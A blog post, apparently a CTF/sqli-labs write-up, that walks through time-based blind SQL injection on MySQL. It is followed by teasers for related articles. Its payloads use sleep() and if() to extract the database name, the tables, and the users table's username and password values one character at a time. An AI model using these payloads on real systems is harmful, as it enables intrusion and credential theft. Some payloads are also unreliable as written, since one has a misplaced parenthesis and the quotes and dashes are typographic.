基于SQLI的SQL时间盲注

最新推荐文章于 2025-03-19 12:24:14 发布
最新推荐文章于 2025-03-19 12:24:14 发布
阅读量448 收藏
点赞数
分类专栏: CTF 文章标签: sql mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44060093/article/details/108256963
版权

第一步 判断注入点与注入类型
?id=1’ and sleep(10) %23
在这里插入图片描述
对比没有使用sleep()函数时的状态如下:
在这里插入图片描述

下面基于时间盲注进行数据库信息获取

第二步 获取数据库长度
id=1’ and if((length(database())=8),1,sleep(5)) %23
在这里插入图片描述
在这里插入图片描述
判断得数据库长度为8
第三步探测数据库其他信息
(1)判断数据库名
?id=1’ and if(ascii(substr(database(),1,1)=115,1,sleep(5))–+
数据库名的第一个字母为s(ascii为115),判断成功直接返回,判断错误的话是暂停5秒
?id=1’ and if(ascii(substr(database(),2,1))=101,1,sleep(5))–+

(2)获取表
?id=1’ and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101,1,sleep(5))–+
email表的第一个字母为e(ascii为101),判断成功直接返回,判断错误的话是暂停5秒
以此类推,我们可以得到所有的数据表emails,referers,uagents,users

(3)获取列
?id=1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))=105,1,sleep(5))–+
猜测users表的第一个列的第一个字符是i
以此类推,我们得到列名是id,username,password

(4)获取列值
?id=1’ and if(ascii(substr((select username from users limit 0,1),1,1))=68,1,sleep(5))–+
猜测username的第一行的第一位为D
按照这种思路依次来获取全部数据库信息

超硬核,SQL注入之时间盲注,原理+步骤+实战思路(1)
2401_84296945的博客
04-30 1263
时间盲注是指基于时间的盲注,也叫延时注入,根据页面的响应时间来判断是否存在注入。
SQL盲注-实战布尔盲注
dkxkl1314的博客
03-09 3289
环境:win10靶场:sqli-labs-master盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能 回显到前端页面。此时,我们需要利用一些方法进行判断或者尝 试,这个过程称之为盲注。而布尔盲注就是SQL语句执行后,页面 不返回具体数据,数据库只返回0或者1(真or假)。类似于无法开口说话的人,只能通过点头和摇头来告诉你答案的正 确与否。在页面中,如果正确执行了用户构造的SQL语句,则返回一种页 面,如果 SQL语句执行错误,则执行另一种页面。
SQL注入-时间盲注
WolvenSec的博客
06-03 2563
SQL时间盲注(Time-based Blind SQL Injection),又叫延时注入,是一种SQL注入攻击技术,用于在无法直接获取查询结果或查看响应内容变化的情况下,通过引入时间延迟来推断数据库的信息;时间盲注依赖于数据库执行查询时的时间延迟,通过观察响应时间的变化,攻击者可以推测出查询结果。这里以Sqli-Labs靶场的Less-9关卡为例子来阐述时间盲注的具体思路:进入关卡首先构建参数id。
SQL注入(boolean盲注+时间盲注
最新发布
2201_76045651的博客
03-19 496
布尔盲注(Boolean-based Blind SQL Injection)是一种SQL注入攻击技术,攻击者通过观察应用程序的布尔响应(真/假)来推断数据库中的信息。这种攻击通常发生在应用程序不直接返回数据库错误信息或查询结果,但会根据查询条件返回不同的响应(如页面内容、HTTP状态码等)时。
N13-sqli盲注 基于时间型
尐猴子君ii的博客
04-08 322
打开pikachu测试平台,sqli base on time 章节。 先输入一个’ 尝试一下,发现反馈不报错。 输入kobe,发现反馈信息不变 打开浏览器的开发者工具,控制台,选择网络 输入 kobe’ and Sleep(5) #,发现延迟5秒发送。 输入错误信息,发现Sleep语句不执行。 这样我们就可以写一个判断kobe’ and if((substr(database(),1,1...
SQL注入之时间盲注
banliyaoguai的博客
05-20 612
盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。对于基于时间的盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。
SQL基于时间的盲注过程
dda6607的博客
06-20 295
0x00 前言 由于要使用到基于时间的盲注,但是我觉得基于时间的盲注其实就是基于布尔的盲注的升级版,所以我想顺便把基于布尔的盲注分析总结了; 首先我觉得基于时间的盲注和基于布尔的盲注的最直观的差别就是“参照物”不同,也就是说基于布尔的盲注,其实是可以通过页面的一些变化来进行判断结果!但是有的时候,执行一些sql语句的测试,页面不会有像布尔盲注的时候比较直观的变化,所以这个时候所谓...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL盲注的关键在于理解和利用服务器对查询结果的反应,通过一系列的逻辑判断和试错,逐步揭示数据库结构和数据。由于其隐秘性和复杂性,这种攻击方法对网站的安全构成了严重的威胁。为了防止布尔型SQL盲注,...
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
下面是基于SQLi-Labs的SQL注入基础知识点: 一、报错注入 报错注入是指攻击者通过构造特定的SQL语句,让攻击者想要查询的信息通过页面的错误提示回显出来。报错注入一般需要具备两个前提条件: 1. Web应用程序未...
sqli-labs-基于布尔的盲注
zlloveyouforever的博客
04-29 1175
sqli-labs第五关--基于布尔的盲注
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
SQL初学(3):时间盲注
m0_64417923的博客
05-05 2070
一,时间盲注 如果页面对于sql语句的执行没有任何回显,或者说回显没有任何差异时,可以使用时间盲注 使用的语句: if 语句: if(<condition>,<true_expr>,<false_expr>) 对condition的结果进行判断,如果返回为true就执行 true_expr ,返回为false就执行 false_expr sleep语句: sleep(<seconds>) 让程序静默一段时间再继续执行...
SQL注入——时间盲注
heyingcheng的博客
03-07 1208
web页面只返回一个正常页面。利用,逐个猜解数据。但是前提是数据库会执行命令代码,只是不反馈页面信息。回顾:当页面有回显选择当页面没有回显但是有报错信息选择当页面既没有回显也没有报错,但是有页面真假值,选择没有回显,没有报错,没有页面真假值,选择。
基于布尔 基于时间的sql盲注
qq_41071646的博客
02-19 556
在上一博客 其实就已经讲到了  sql     但是上一节 主要是有回显  页面中 会有很多 提示的信息  但是在实战中  这些东西 其实都不怎么存在的  这里  其实又分了 两种情况  第一种 是基于 布尔  第二种 就是  基于时间的  盲注  这两种   其实 都比较  简单     先说  基于 布尔的吧  基于布尔的盲注 :    其实这个很好理解  页面只会返回 0或1  我...
SQL注入——基于时间的盲注(sqli-labs less9)
yuan114012的博客
05-21 1079
一.基于时间得盲注 适用场景:没有数据回显,条件正确与否结果一样 利用方式:构造判断条件,添加sleep,逐个猜测(盲猜) 1.所需语法与函数 IF表达式 IF( expr1 , expr2 , expr3 ) #expr1 的值为 TRUE,则返回值为 expr2 #expr1 的值为FALSE,则返回值为 expr3 expr1 的值为 TRUE,则返回值为 expr2 expr1 的值为FALSE,则返回值为 expr3 mysql> select if(1=1,1,.
SQL注入---时间盲注
ningwangh的博客
08-07 2568
时间盲注使用的优先级并不高,通常是在联合注入、报错注入、布尔盲注都无法使用时才会考虑,希望这篇文章能带给你帮助。
SQL时间盲注
2301_78549931的博客
08-05 1215
在注入时,information_schema库的作用就是获取 table_schema table_name, column_name .如果数据库名的第一个字符的ascii码值等于115,则页面沉睡3秒,如果数据库名的第一个字符的ascii码值不等于115,则页面不沉睡。这个库 就像时MYSQL的信息数据库,他保存着mysql 服务器所维护的所有其他的数据库信息, 包括了 库名,表名,列名。根据表名知道可能用户的账户和密码是在users表中,接下来我们就是得到该表下的字段名以及内容。
mysql基于时间盲注_基于时间型SQL盲注
weixin_39581739的博客
02-08 276
1 基于时间型SQL盲注注入SQL 代码之后, 存在以下两种情况:如果注入的SQL代码不影响后台[ 数据库] 的正常功能执行, 那么Web 应用的页面显示正确( 原始页面) 。如果注入的SQL 代码影响后台数据库的正常功能( 产生了SQL 注入) , 但是此时Web 应用的页面依旧显示正常( 原因是Web 应用程序采取了“ 重定向" 或“ 屏蔽 ”措施)。产生一个疑问: 注入的SQL 代码到底被后...
sqli-labs布尔盲注
03-12
对于基于布尔的SQL盲注而言,其核心在于通过构造不同的查询条件使得应用程序返回两种不同类型的响应——即真/假状态。通常情况下,这涉及到向服务器发送一系列请求并观察应用行为的变化,以此推测出隐藏的信息。例如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值